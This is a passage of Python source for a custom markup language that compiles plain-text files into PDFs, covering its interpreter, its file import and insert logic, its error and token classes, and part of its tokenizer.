context.locals().items()})] else: raise Exception(f"The following token was found in a PythonNode, it is not supposed to be in a PythonNode: {tt}") if isinstance(python_result, type(None)): python_result = [] elif isinstance(python_result, str): python_result = Tokenizer.plaintext_tokens_for_str(python_result) elif isinstance(python_result, MarkedUpText): python_result = Tokenizer.tokens_for_marked_up_text(python_result) elif isinstance(python_result, Exception) or issubclass(type(python_result), Exception): return res.failure(PythonException(node.start_pos.copy(), node.end_pos.copy(), 'An error occured while running your Python code.', python_result, context)) return res.success(python_result) def _visit_CommandDefNode(self, node, context, flags): res = RunTimeResult() cmnd_name = node.cmnd_name.value cmnd_params = node.cmnd_params cmnd_key_params = node.cmnd_key_params text_group = node.text_group context.symbols.set(cmnd_name, Command( cmnd_params, cmnd_key_params, text_group )) return res.success([]) def _visit_CommandCallNode(self, node, context, flags): res = RunTimeResult() tokens = [] cmnd_name_str = node.cmnd_name.value command_to_call = context.symbols.get(cmnd_name_str) self._push_command_node(node) if command_to_call is None: # The command is undefined return res.failure(RunTimeError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), '"\\' + f'{cmnd_name_str}" is undefined.', context )) elif isinstance(command_to_call, TextGroupNode): # Handle when the "command" is actually a parameter that contains # text. 
For example, in # # \hello = (\test) { # \test # } # # \test is a actually storing a TextGroupNode when the command # \hello is called, so this method handles returning the TextGroupNode # that that \test contains when \test is called result = res.register(self.visit(command_to_call, context, flags)) if res.error: return res if result: tokens.extend(result) else: # Command is defined and we need to call it min_args = len(command_to_call.params) max_args = min_args + len(command_to_call.key_params) num_positional_args = len(node.cmnd_tex_args) num_key_args = len(node.cmnd_key_args) num_args_given = num_positional_args + num_key_args # Check if enough positional arguments were given if num_positional_args < min_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command requires {min_args} argument(s), but {num_positional_args} was/were given.', )) # Check if too many arguments were given if num_args_given > max_args: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The "{cmnd_name_str}" command takes {max_args} argument(s) max, but {num_args_given} was/were given.', )) cmnd_args = {} # Add all the command names first cmnd_and_key_param_names = [] for param in command_to_call.params: name = param.identifier.value if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) # Take each Parameter key-value pair (so the key-value pairs # in the definition of the command) and add them to the dict for cmnd_key_param in command_to_call.key_params: name = cmnd_key_param.key.value # Now add the key-params because the positional arguments will # fullfill parameters and key-parameters in the order that # they are in cmnd_and_key_param_names if name in cmnd_and_key_param_names: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'The argument "{name}" was given more than one time. Every argument can only be given once, either by a key-argument or a positional argument.' )) cmnd_and_key_param_names.append(name) cmnd_args[name] = cmnd_key_param.text_group # Now replace those key-value pairs from the definiton of the command # with those given in the call of command for key_arg in node.cmnd_key_args: # key params CommandKeyParamNode key = key_arg.key.value if not (key in cmnd_args): return res.failure(InvalidSyntaxError(key_arg.key.start_pos.copy(), key_arg.key.end_pos.copy(), f'"{key}" is not defined in command "{cmnd_name_str}". 
In other words, this key is not defined as a key-argument in the command\'s definition.', )) cmnd_args[key] = key_arg.text_group # now take each name from the POSITIONAL-ARGUMENT names provided in # the command's definition and provide the values for them from # the command call for param_name, arg in zip(cmnd_and_key_param_names, node.cmnd_tex_args): # params are CommandParamNode cmnd_args[param_name] = arg.text_group # Init py_locals, the python local variables to add to the current # context py_locals = {} for key, arg in cmnd_args.items(): # Visit the argument node and get the tokens from it new_tokens = res.register(self.visit(arg, context, flags)) if res.error: return res # Convert the tokens to MarkedUpText, something that can be used # in Python marked_up_text = Tokenizer.marked_up_text_for_tokens(new_tokens) if marked_up_text == '<NONE>': marked_up_text = None # Assign each python local to its marked_up_text py_locals[key] = marked_up_text child_context = context.gen_child(cmnd_name_str, node.start_pos.copy(), py_locals) # Just check to make sure that a value has been passed for each needed argument for key, value in cmnd_args.items(): if value == 0: return res.failure(InvalidSyntaxError(node.cmnd_name.start_pos.copy(), node.cmnd_name.end_pos.copy(), f'"{key}", an argument in {cmnd_name_str}, has no value. You need to pass in an argument for it in this call of the command.', )) else: child_context.symbols.set(key, value) self._push_context(child_context) # actually run the command now that its variables have been added to the context result = res.register(self.visit(command_to_call.text_group, child_context, flags)) if res.error: return res tokens = result self._pop_context() self._pop_command_node() if len(tokens) > 0: # Find the first Token and set space_before to True if the # command call had space_before = True, otherwise set it False for token in tokens: if isinstance(token, Token): token.space_before = node.cmnd_name.space_before break # Tells the Paragraph Node that a Command was called so that it can # decide whether to insert a paragraph break depending on whether # there was one before the Command was called or not tokens.insert(0, Interpreter.CommandCalled) return res.success(tokens) def _visit_TextGroupNode(self, node, context, flags): res = RunTimeResult() doc_tokens = res.register(self.visit(node.document, context, flags)) if res.error: return res for token in doc_tokens: if isinstance(token, Token): token.space_before = node.ocbrace.space_before break return res.success(doc_tokens) def _visit_PlainTextNode(self, node, context, flags): res = RunTimeResult() return res.success(node.plain_text) # ----------------------------- # Helper Classes class CommandCalled: """ A helper class that just tells the Paragraph Node that a Command was called so that it can make an imformed decision on whether to add a paragraph break """ pass # ----------------------------------------------------------------------------- # Compiler Class class CompilerProxy: """ The actual object that is given to files being compiled named 'compiler'. The reason this object is given and not the actual compiler because this makes it clear what methods are actually meant to be used in the files being compiled. """ def __init__(self, compiler): self._compiler = compiler # --------------------------------- # Methods for Directory/File Finding def main_file_path(self): """ The path to the main/input file that the compiler started with. 
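A hedged usage sketch: this proxy is exposed to embedded Python as the global
name 'compiler', so code inside a file being compiled could do something like
the following (purely illustrative):

    input_path = compiler.main_file_path()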
""" return self._compiler.main_file_path() def main_file_dir(self): """ The directory that the main/input file is in. """ return self._compiler.main_file_dir() def curr_file_path(self): """ The path to the file that is currently being compiled i.e. the file that you are in when you call this method. """ return self._compiler.curr_file_path() def curr_file_dir(self): """ The directory that the current file being run is in. """ return self._compiler.curr_file_dir() # --------------------------------- # Methods for importing/inserting files def strict_import_file(self, file_path): self._compiler.strict_import_file(file_path) def std_import_file(self, file_path): self._compiler.std_import_file(file_path) def import_file(self, file_path): self._compiler.import_file(file_path) def far_import_file(self, file_path): self._compiler.far_import_file(file_path) def insert_file(self, file_path): self._compiler.insert_file(file_path) def strict_insert_file(self, file_path): self._compiler.strict_insert_file(file_path) def far_insert_file(self, file_path): self._compiler.far_insert_file(file_path) # --------------------------------- # Other Methods def placer_class(self): return self._compiler.placer_class() def set_placer_class(self, placer_class): return self._compiler.set_placer_class(placer_class) class Compiler: """ This object orchestrates the compilation of plaintext files into PDFs """ def __init__(self, input_file_path, path_to_std_dir, print_progess_bars=False, encoding='utf-8'): self._commands = {} self._files_by_path = {} assert path.isfile(input_file_path), f'The given path is not to a file or does not exist: {input_file_path}' self._input_file_path = input_file_path self._input_file_dir = path.dirname(input_file_path) self._std_dir_path = path_to_std_dir self._print_progress_bars = print_progess_bars self._encoding = encoding # The encoding that the pdfo files are in self._toolbox = ToolBox(self) self._compiler_poxy = CompilerProxy(self) self._placer_class = NaivePlacer self._interpreter_stack = [] # The globals that will be copied every time a fresh set of globals # is needed self._globals = {'__name__': __name__, '__doc__': None, '__package__': None, '__loader__': __loader__, '__spec__': None, '__annotations__': None, '__builtins__': _copy.deepcopy(globals()['__builtins__']), 'compiler':self._compiler_poxy, 'toolbox':self._toolbox} # remove any problematic builtins from the globals rem_builtins = [] for key in rem_builtins: self._globals['__builtins__'].pop(key) # ------------------------------------------------------------------------- # Main Methods def compile_pdf(self): """ Compiles the PDF and returns the PDFDocument that can be used to draw the PDF multiple times to different files. """ fresh_context = self._fresh_context(self._input_file_path) # Now run the main\input file self._insert_file(self._input_file_path, fresh_context, print_progress=self._print_progress_bars) from placer.token_stream import TokenStream return TokenStream(fresh_context.token_document(), self._placer_class, fresh_context.globals(), self._input_file_path, self._print_progress_bars).place_tokens() def compile_and_draw_pdf(self, output_pdf_path): """ Convenience function that compiles and draws the PDF """ self.compile_pdf().draw(output_pdf_path, print_progress=self._print_progress_bars) # ------------------------------------------------------------------------- # Helper Methods def _fresh_globals(self): """ Returns a fresh set of globals as they are before the program starts compiling. 
These globals are for the python exec and eval methods that are used to run python code. """ return {key:val for key, val in self._globals.items()} def _fresh_context(self, file_path): """ Returns a fresh context for running a file as if it were the main/input file (even if it isn't actually the main/input file). """ parent = None; entry_pos = None; token_document = []; locals = None context = Context(file_path, file_path, parent, entry_pos, token_document, self._fresh_globals(), locals, SymbolTable()) # insert the standard file into the context self._insert_file(self._path_to_std_file(STD_LIB_FILE_NAME), context, print_progress=self._print_progress_bars) return context def _push_interpreter(self): """ Pushes a new Interpreter onto the interpreter stack. """ self._interpreter_stack.append(Interpreter()) def _pop_interpreter(self): """ Pops the _curr_interpreter off the interpreter stack. """ return self._interpreter_stack.pop() def _curr_interpreter(self): """ Returns the current Interpreter. """ _is = self._interpreter_stack return None if len(_is) <= 0 else _is[-1] def _curr_context(self): """ Returns the current Context. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_context def _curr_tok_document(self): """ Returns the current document made of tokens, not to be confused with the PDFDocument object that is returned by the Placer. The "document" returned by this method is a list of Tokens that can be given to a Placer to produce a PDFDocument. """ ci = self._curr_interpreter() return None if ci is None else ci._curr_document def _compiler_import_file(self, file_path, print_progress=False): """ Imports a file. If the file has not already been imported by the compiler, this method will read in the file, tokenize, and parse it into an Abstract Syntax Tree (AST), before caching the raw_text, tokens, and ast in a File object and returning the File object. If the file has already been imported, this method will return the cached File object. To run the file object, the root of the AST must be visited by the Interpreter. This can be acheived by doing Interpreter().visit_root(file.ast) """ assert path.isfile(file_path), f'Could not import "{file_path}"' file_path = path.abspath(file_path) # If file already imported, just return the file if file_path in self._files_by_path: return self._files_by_path[file_path] file = File(file_path) self._files_by_path[file_path] = file try: with open(file_path, encoding=self._encoding) as f: file.raw_text = f.read() # Raw text that the file contains except: raise AssertionError(f'Could not decode the given file as {self._encoding}.') file.tokens = Tokenizer(file.file_path, file.raw_text, print_progress_bar=print_progress).tokenize() # Returns a ParseResult, so need to see if any errors. If no Errors, then set file.ast to the actual abstract syntax tree file.ast = Parser(file.tokens, print_progress_bar=print_progress).parse() if file.ast.error is not None: raise file.ast.error else: file.ast = file.ast.node return file def _run_file(self, file, context, print_progress=False): """ Runs a file, importing it first if need be, and returns the tokens and context that that the file generates. By "import", I mean that it loads the file into memory, tokenizes it and makes it into an AST, not that it does the same thing as the \\import command context is the current Context that you want the file to be run in. 
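A minimal calling sketch, matching how _insert_file and _import_file in this
class already use it (not additional API):

    tokens = self._run_file(file_path, context, print_progress)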
""" if isinstance(file, str): # It should be a file path file_obj = self._compiler_import_file(file, print_progress) else: # It should be a File object file_obj = file if file_obj.being_run: raise AssertionError(f"The given file is already being run (imported or inserted), so you probably have a circular import which is not allowed: {file_obj.file_path}") else: file_obj.being_run = True self._push_interpreter() # Save the context's current display_name and file_path old_disp_name = context.display_name old_path = context.file_path # Give the context the display name and file path of the file it is now # going into context.display_name = file_obj.file_path context.file_path = file_obj.file_path # Since just pushed interpreter, self._curr_interpreter() should not be None result = self._curr_interpreter().visit_root(file_obj.ast, context, InterpreterFlags(), print_progress) # Restore the context's display name and file_path to what they were before context.display_name = old_disp_name context.file_path = old_path self._pop_interpreter() if result.error: raise result.error file_obj.being_run = False return result.value # Return the tokens gotten by running the file def _insert_file(self, file_path, context, print_progress=False): """ Inserts the file into the current file. This means that the file must be run with the current context as if it were directly in the file. context is the context that this file is being inserted into """ # Since the context is directly given to self._run_file, all of the # commands and whatnot in the global portion of the file will be # added to the given context as if it was in the context directly # and not in another file was_global = context.global_level context.global_level = True i = len(context.token_document()) self._run_file(file_path, context, print_progress) # Want to add a space before the first Token we come accross. # Note: the compiler may still not render a space before the token # if the token is at the start of a line. That is why this is safe # to do. We are meely saying "this Token should have a space before # it if it makes sense to have one before it" doc = context.token_document() ci = self._curr_interpreter() if ci and ci.curr_command_node(): ccc = ci.curr_command_node() length = len(doc) while True: if i >= length: # reached end of Token document without finding a single # Token break curr = doc[i] if isinstance(curr, Token): # Found a Token so set whether it has a space before it based # on the current command that is being run and whether # the command has a space before it (i.e. if there is # space before \insert{file_path}, then the first token # of the inserted text from the file should have a space # before it, otherwise it should not have a space before # it) curr.space_before = ccc.cmnd_name.space_before break i += 1 context.global_level = was_global def _import_file(self, file_path, context, commands_to_import=None, print_progress=False): """ Imports a file. This is very different from self._insert_file because it takes the file, gives it a fresh context, and runs the file. The resulting context can be saved to the File object for the file because the resulting global context from running the file does not depend on any other file's context. 
In this way, once a file is imported once, its resulting tokens and Context can be reused over and over again, whereas the tokens and Context from self._insert_file cannot be and the file must be re-run every time it is inserted into a file, regardless of whether it has been inserted into a file before. context is the context that you want to import the file into. If commands_to_import are given, then only the commands by the names specified in the list of strings will be imported. All Python globals will still, however, be imported. """ file_obj = self._compiler_import_file(file_path, print_progress) if file_obj.import_context is None: # Since this file has not yet been run, we will have to run it # now with a fresh context unrelated to any other context # Using file_obj.file path in case it is different from the argument file_path context_to_import = self._fresh_context(file_obj.file_path) tokens = self._run_file(file_obj, context_to_import, print_progress) # Since the file was imported, that means it does not depend on the # current context and thus the context can be saved and reused later file_obj.import_context = context_to_import # I expect most imports to have some global Python code that they # want to be run on the second pass, so that code must be imported # too or else it will never reach the Placer and be run. tokens_to_import = [] for token in tokens: if isinstance(token, Token) and token.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): tokens_to_import.append(token) file_obj.import_tokens = tokens_to_import else: # Since this file has been imported before, just reuse the same # context as last time because the context is not dependant # on the current context of when/where the file is being run context_to_import = file_obj.import_context tokens_to_import = file_obj.import_tokens try: context.import_(context_to_import, tokens_to_import, commands_to_import) except AssertionError as e: raise AssertionError(f'{file_path} could not be imported because of the following error:{e}') def _path_to_std_file(self, file_path): """ Returns the file path as a file path to a standard directory file. """ # Replace the ending of the file path with the one used by all standard files split_file_path = file_path.split('.') if len(split_file_path) > 1 and split_file_path[-1] == STD_FILE_ENDING: split_file_path.pop() split_file_path.append(STD_FILE_ENDING) file_path = '.'.join(split_file_path) # check if the file exists file_path = path.abspath(path.join(self._std_dir_path, file_path)) return file_path def _path_rel_to_file(self, file_path, curr_file=True): """ Returns the file path if the given path is relative to the main file being run or the current file being run. """ dir = self.curr_file_dir() if curr_file else self.main_file_dir() file_path = path.abspath(path.join(dir, file_path)) return file_path def _get_near_path(self, file_path): """ Gets the near path to insert/import. This checks the path relative to to the current file first, then checks the file relative to the main/input file, and then it checks the standard directory. 
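Illustrative lookup order, inferred from the body below; the file name
'macros.pdfo' is hypothetical:

    1. <directory of the current file>/macros.pdfo
    2. <directory of the main/input file>/macros.pdfo
    3. <standard directory>/macros.pdfo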
""" ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) assert path.isfile(std_path), f'Could not get near path for "{file_path}" because neither "{cf_rel_path}", nor "{input_rel_path}", nor "{std_path}" lead to a file and/or exist.' return ret_path def _get_far_path(self, file_path): """ Gets the far path to insert/import. This checks the standard directory first and then checks the path relative to the main/input file and then checks the path relative to the current file. """ _file_path, file_name = path.split(file_path) ret_path = std_path = self._path_to_std_file(file_path) if not path.isfile(ret_path): ret_path = input_rel_path = self._path_rel_to_file(file_path, curr_file=False) if not path.isfile(ret_path): ret_path = cf_rel_path = self._path_rel_to_file(file_path, curr_file=True) assert path.isfile(std_path), f'Could not get far path for "{file_path}" because neither "{std_path}", nor "{input_rel_path}", nor "{cf_rel_path}" lead to a file and/or exist.' return ret_path # ------------------------------------ # Methods available from CompilerProxy # Methods for Inserting and Importing Files def insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def strict_insert_file(self, file_path): """ Runs the file at the given file path and inserts it into the current document. The file path is assumed to be relative to the current file. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' # Actually insert the file self._insert_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def far_insert_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot far insert into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._insert_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) def strict_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. This file path is assumed to be relative to the main file being run. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_rel_to_file(file_path), cc, print_progress=self._print_progress_bars) def import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. 
""" file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_near_path(file_path), cc, print_progress=self._print_progress_bars) def std_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._path_to_std_file(file_path), cc, print_progress=self._print_progress_bars) def far_import_file(self, file_path): """ Runs the file at the given file_path, importing its commands but not inserting its text into the current document. """ file_path = str(file_path) cc = self._curr_context() assert cc is not None, 'Cannot import into a Non-existent Context. This is a Compiler error, report it the people making the compiler.' self._import_file(self._get_far_path(file_path), cc, print_progress=self._print_progress_bars) # Methods for retrieving files and directories for the current file. def main_file_path(self): """ Returns the file path to the main/first/input file that is/was run. """ return self._input_file_path def main_file_dir(self): """ Returns an absolute path to the directory that the main file that is being run is in. """ return path.dirname(self.main_file_path()) def curr_file_path(self): """ Returns an absolute path to the current file that is being run. """ cc = self._curr_context() assert cc is not None, f'The current context was None so the current file path could not be retrieved.' return cc.file_path def curr_file_dir(self): """ Returns an absolute path to the directory that the current file that is being run is in. """ return path.dirname(self.curr_file_path()) # Misc Methods def placer_class(self): return self._placer_class def set_placer_class(self, placer_class): """ Sets the placer class that will be used to place the tokens on the PDF. This allows a person to, theoretically, create their own placer in a pdfo file and make the compiler use that instead. """ self._placer_class = placer_class class Command: """ Represents a command in the file. """ __slots__ = ['params', 'key_params', 'text_group'] def __init__(self, params, key_params, text_group): self.params = params self.key_params = key_params self.text_group = text_group # This will be run for the command
""" This is the main file that holds the Tokenizer, Parser, and Interpreter that actually compile the PDF. """ import os.path as path import re import copy as _copy from decimal import Decimal from placer.placer import Placer from constants import CMND_CHARS, END_LINE_CHARS, ALIGNMENT, TT, TT_M, WHITE_SPACE_CHARS, NON_END_LINE_CHARS, PB_NUM_TABS, PB_NAME_SPACE, STD_FILE_ENDING, STD_LIB_FILE_NAME, OUT_TAB from tools import assure_decimal, is_escaped, is_escaping, exec_python, eval_python, string_with_arrows, trimmed, print_progress_bar, prog_bar_prefix, calc_prog_bar_refresh_rate, assert_instance from marked_up_text import MarkedUpText from markup import Markup, MarkupStart, MarkupEnd from toolbox import ToolBox from placer.placers.naiveplacer import NaivePlacer # ----------------------------------------------------------------------------- # Errors That Can Occur While Compiling class Error(Exception): def __init__(self, pos_start, pos_end, error_name, details): self.pos_start = pos_start self.pos_end = pos_end self.error_name = error_name self.details = details def as_string(self): result = f'Line {self.pos_start.ln + 1}, Column {self.pos_start.col + 1}, in file {self.pos_start.file_path}\n' result += f' {self.error_name} Occured: {self.details}' result += '\n' + string_with_arrows(self.pos_start.file_text, self.pos_start, self.pos_end) return result class ExpectedValidCmndNameError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Valid Command Name', details) class IllegalCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Illegal Character Error', details) class ExpectedCharError(Error): def __init__(self, pos_start, pos_end, details): super().__init__(pos_start, pos_end, 'Expected Character Error', details) class InvalidSyntaxError(Error): def __init__(self, pos_start, pos_end, details=''): super().__init__(pos_start, pos_end, 'Invalid Syntax Error', details) class RunTimeError(Error): def __init__(self, pos_start, pos_end, details, context): super().__init__(pos_start, pos_end, 'Run-Time Error', details) self.context = context def generate_traceback(self): result = '' pos = self.pos_start ctx = self.context while ctx is not None: result = f' File {pos.file_path}, line {pos.ln + 1}, in {ctx.display_name}\n' + result pos = ctx.entry_pos ctx = ctx.parent return 'Traceback (most recent call last):\n' + result class PythonException(RunTimeError): def __init__(self, pos_start, pos_end, details, python_error, context): import traceback self.python_error = f'{python_error.exc_trace}' super().__init__(pos_start, pos_end, details, context) self.error_name = 'Python Exception' def as_string(self): string = super().as_string() string += '\nHere is the Python Exception:\n\n' string += f'{self.python_error}' return string # ----------------------------------------------------------------------------- # Position Class class Position: """ Position in a Tokenized file or a file that is being tokenized. 
""" __slots__ = ['idx', 'ln', 'col', 'file_path', 'file_text'] def __init__(self, idx, ln, col, file_path, file_text): self.idx = idx self.ln = ln self.col = col self.file_path = file_path # The path tot he file that this is a position in self.file_text = file_text # The text of the file this is a position in def advance(self, current_char=None): self.idx += 1 self.col += 1 if current_char in END_LINE_CHARS: self.ln += 1 self.col = 0 return self def copy(self): return Position(self.idx, self.ln, self.col, self.file_path, self.file_text) def __repr__(self): file = self.file_path.split('\\')[-1] return f"{self.__class__.__name__}(line {self.ln}, col {self.col}, in {file})" # ----------------------------------------------------------------------------- # File Class class File: __slots__ = ['file_path', 'raw_text', 'tokens', 'ast', 'import_context', 'import_tokens', 'being_run'] def __init__(self, file_path): self.file_path = file_path # Path to file # Fields set in Compiler._compiler_import_file self.raw_text = None # The raw text that is in the file self.tokens = None # The tokens that make up the File once it has been tokenized self.ast = None # The Abstract Syntax tree from the Tokens being Parsed # Fields set by Compiler._import_file self.import_context = None # The context obtained by running the file, can be used to import this file into another file self.import_tokens = None # The tokens to add to the token_document when the file is imported self.being_run = False # ----------------------------------------------------------------------------- # Token Class class Token: __slots__ = ['start_pos', 'end_pos', 'type', 'value', 'space_before'] def __init__(self, type, value, start_pos, end_pos=None, space_before=True): self.start_pos = start_pos if isinstance(space_before, bool): # Space before is whether there should be a space before the token # when it is put on the page. This is so that tokens like the # '=' and '{' that are singled out of a sentence can still tell # the placer whether there was space before them because the # default is to just put a space before each token is placed down. self.space_before = space_before else: self.space_before = (space_before in WHITE_SPACE_CHARS) if end_pos is None: end_pos = self.start_pos.copy() end_pos.advance() # Necessary if you want errors to display the errors correctly because they use start_pos - end_pos self.end_pos = end_pos else: self.end_pos = end_pos self.type = type self.value = str(value) if type == TT.WORD and value == '': raise Exception(f'An empty string has been made into a Token. This is a compiler problem. {self}') def matches(self, token_type, value): """ Checks if the given token_type and value matches this one. """ return self.type == token_type and self.value == value def copy(self): start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return Token(self.type, self.value, start_pos, end_pos, self.space_before) def gen_pass_2_python(self, locals): """ Generates a SecondPassPythonToken that can store the locals that should be provided when the python code is run in the Placer. The Placer already has the globals that should be provided. 
""" start_pos = None if self.start_pos is None else self.start_pos.copy() end_pos = None if self.end_pos is None else self.end_pos.copy() return SecondPassPythonToken(self.type, self.value, start_pos, end_pos, self.space_before, locals) def __repr__(self): """ This is what is called when you print this object since __str__ is undefined. """ return f"Token(\"<{self.type}>\":{' ' if self.space_before else ''}{self.value})" class SecondPassPythonToken(Token): __slots__ = Token.__slots__[:] __slots__.extend(['locals']) def __init__(self, type, value, start_pos, end_pos=None, space_before=False, locals=None): super().__init__(type, value, start_pos, end_pos, space_before) self.locals = locals # ----------------------------------------------------------------------------- # Tokenizer Class class Tokenizer: """ Takes raw text and tokenizes it. """ def __init__(self, file_path, file_text, starting_position=None, print_progress_bar=False): super().__init__() self._print_progress_bar = print_progress_bar if starting_position: # Parse assuming that you are starting at the given line and column int he file self._pos = starting_position.copy() self._pos.idx = -1 else: # Parse assuming that you are starting at the beginning of the file self._pos = Position(-1, 0, -1, file_path, file_text) self._text = file_text self._current_char = None self._previous_char = '' self._plain_text = '' self._plain_text_start_pos = None self._space_before_plaintext = False self._unpaired_cbrackets = 0 self._unpaired_oparens = 0 self._tokens = [] self._advance() def _advance(self, num=1): """Advances to the next character in the text if it should advance.""" for i in range(num): self._previous_char = self._current_char self._pos.advance(self._current_char) self._current_char = self._text[self._pos.idx] if self._pos.idx < len(self._text) else None @staticmethod def plaintext_tokens_for_str(string, count_starting_space=False): """ If you want to write plaintext to the placer and the string to be interpreted only as plaintext, then this is what you use to tokenize the string. Just take the return-ed string from this method and give it to the place_text method of the Placer. 
If count_starting_space is True, then it will treat the whitespace before the first letter as actual space that could produce a paragraph break """ tokens = [] idx = -1 cc = None def next_tok(idx): idx += 1 return string[idx] if idx < len(string) else None, idx def try_append_word(curr_word, space_before): curr_word = re.sub('(\s)+', '', curr_word) if len(curr_word) > 0: tokens.append(Token(TT.WORD, curr_word, DUMMY_POSITION.copy(), space_before=space_before)) cc, idx = next_tok(idx) if not count_starting_space: # Eat all end line chars at beginning so no paragraph break at beginning while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) space_before = False curr_word = '' while cc is not None: if cc in NON_END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True while (cc is not None) and (cc in NON_END_LINE_CHARS): cc, idx, = next_tok(idx) continue elif cc in END_LINE_CHARS: cc, idx = next_tok(idx) try_append_word(curr_word, space_before) curr_word = '' space_before = True if cc in END_LINE_CHARS: tokens.append(Token(TT.PARAGRAPH_BREAK, TT.PARAGRAPH_BREAK, DUMMY_POSITION.copy())) cc, idx = next_tok(idx) while (cc is not None) and (cc in END_LINE_CHARS): cc, idx, = next_tok(idx) continue else: curr_word += cc cc, idx = next_tok(idx) try_append_word(curr_word, space_before) return tokens @staticmethod def marked_up_text_for_tokens(list_of_tokens): """ Returns a MarkedUpText object that is equivalent to the List of Tokens given. """ text = MarkedUpText() curr_index = 0 pending_markups = [] for t in list_of_tokens: if isinstance(t, (MarkupStart, MarkupEnd)): text.add_markup_start_or_end(t, curr_index) elif isinstance(t, Token): if t.type == TT.PARAGRAPH_BREAK: # Add two newlines to signify a paragraph break text += '\n\n' curr_index += 2 elif t.type in (TT.EXEC_PYTH2, TT.EVAL_PYTH2): markup = Markup() markup.add_python(t) text.add_markup(markup, curr_index) else: if t.space_before: text += ' ' curr_index += 1 text += t.value curr_index += len(t.value) else: raise Exception(f'{t} was in the list of tokens given to be changed into MarkedUpText, but MarkedUpText can\'t denote it. This is a compiler problem, tell the makers of the compiler that you got this error.') text_len = len(text) #print(f'curr_index = {curr_index}, text_len = {text_len}, markups = {None if text_len not in text._markups else text._markups[text_len]}') if text_len > 0 and text_len in text._markups: markups = text._markups.pop(text_len) index = text_len - 1 if index in text._markups: text._markups[index].extend(markups) else: text._markups[index] = markups #print(f'AFTER markups = {None if index not in text._markups else text._markups[index]}') return text @staticmethod def tokens_for_marked_up_text(marked_up_text): """ Returns a list of tokens for the given MarkedUpText. 
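A hedged usage sketch, mirroring how _visit_PythonNode converts the result of
embedded Python back into Tokens:

    if isinstance(result, MarkedUpText):
        tokens = Tokenizer.tokens_for_marked_up_text(result)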
""" def try_token(token_value, token_list): if len(token_value) > 0: space_before = (token_value[0] in WHITE_SPACE_CHARS) tokens = Tokenizer.plaintext_tokens_for_str(str(token_value), True) token_value = '' if len(tokens) > 0: tokens[0].space_before = space_before token_list.extend(tokens) return token_value, token_list token_list = [] token_value = '' pending_end_markups = [] for i, char in enumerate(marked_up_text): markups = marked_up_text.markups_for_index(i) # markups is a list of MarkupStart and MarkupEnd objects or # None if there are None # Since Markups are inclusive of their index, the MarkupStarts must # be appended before the next char and the MarkupEnds must be # appended after the next character is added if markups: token_value, token_list = try_token(token_value, token_list) for markup in markups: if isinstance(markup, MarkupStart): token_list.append(markup) else: pending_end_markups.append(markup) token_value += char if pending_end_markups: token_value, token_list = try_token(token_value, token_list) for markup in pending_end_markups: token_list.append(markup) pending_end_markups = [] token_value, token_list = try_token(token_value, token_list) return token_list _what_can_be_escaped = {'{', '}', '=', '\\', '(', ')', ','} def tokenize(self, file=True): """ Turn the raw text into tokens that the compiler can use. If file is true, the tokenizer assumes that the text is from a file and bookends the tokens with TT.FILE_START and TT.FILE_END """ self._tokens = [] self._plain_text = '' what_can_be_escaped = self._what_can_be_escaped if file: self._tokens.append(Token(TT.FILE_START, '<FILE START>', self._pos.copy())) print_progress = self._print_progress_bar if print_progress: text_len = len(self._text) prefix = prog_bar_prefix('Tokenizing', self._pos.file_path) refresh = calc_prog_bar_refresh_rate(text_len) full_bar_printed = False if print_progress_bar(0, text_len, prefix): full_bar_printed = True # By default, all text is plain text until something says otherwise while self._current_char is not None: i = self._pos.idx if print_progress and (i % refresh) == 0: print_progress_bar(i, text_len, prefix) cc = self._current_char t = None if is_escaped(i, self._text, what_can_be_escaped): self._plain_text_char() elif is_escaping(i, self._text, what_can_be_escaped): self._advance() # Just advance because it is just escaping something else elif cc in END_LINE_CHARS: self._try_word_token() self._advance() pos_start = self._pos.copy() if 